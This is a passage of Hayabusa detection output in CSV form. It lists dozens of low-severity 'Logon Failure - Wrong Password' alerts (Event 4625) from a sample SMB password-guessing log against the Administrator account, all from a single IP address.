NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: 